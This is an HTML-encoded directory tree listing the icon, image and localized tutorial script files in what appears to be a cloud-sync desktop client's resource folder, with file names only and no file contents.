&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FRE_Tutorial_Share.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; globeIcon20x20.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; globeIcon2.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; globeIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; globe.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; helpicon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; helpSubIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; HeroImage_FolderBackupACM.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; houseIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iceBucket.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; infiniteDiamond.webp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; infiniteLightRayDiamond.webp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; InfoBlue.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; infoIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; infoIconYellow.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; kfm_acm_gpo.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; kfmAllBackedUp.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; kfmCloseFileToBackup.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; kfm_mega_gpo.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; layerIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; lightBulb.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; lightRayDiamond.webp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; list_checkbox.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; loading_spinner_arrow.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; loading_spinner.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; loading.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; lock_graphic.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; lock_icon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; lockIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mac_fre_choose_folder.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mac_FRE_Tutorial_Intro.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mac_FRE_Tutorial_Share.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; manageStorage.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; onDemandFilesDehydrate.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; onDemandFiles.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; onDemandSelectiveSync.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; onenote.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; openFileIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; openFolder.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; optionalDiagnosticData.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; outlook.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; overflowIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; partiallyFreezing.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; paused.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; pauseIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; powerpoint.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; premium_gem.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; premiumIcon20x20.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; premiumIcon2.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; premiumIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; recycleBinIcon20x20.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; recycleBinIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; recycleBin.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; reportProblemicon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; requiredDiagnosticData.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; reSignIn.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; resumeIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; resumeSyncing.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; scrollbarChevronDown.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; scrollbarChevronUp.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sendFeedbackIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settingsIcon2.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settingsIcon3.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settingsIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; shareicon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; share.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; shield_icon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; signInExclamation.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; signIn.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; stackedIceCubes.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; stackicon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; stack.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; startOneDrive.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sv_fre_choose_folder.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sv_FRE_Tutorial_Intro.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sv_FRE_Tutorial_Share.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusBadgeCloud.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusBadgeError.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusBadgeInfo.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusBadgeOffline.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusBadgePaused.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusBadgeSyncing.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusBadgeWarning.svg
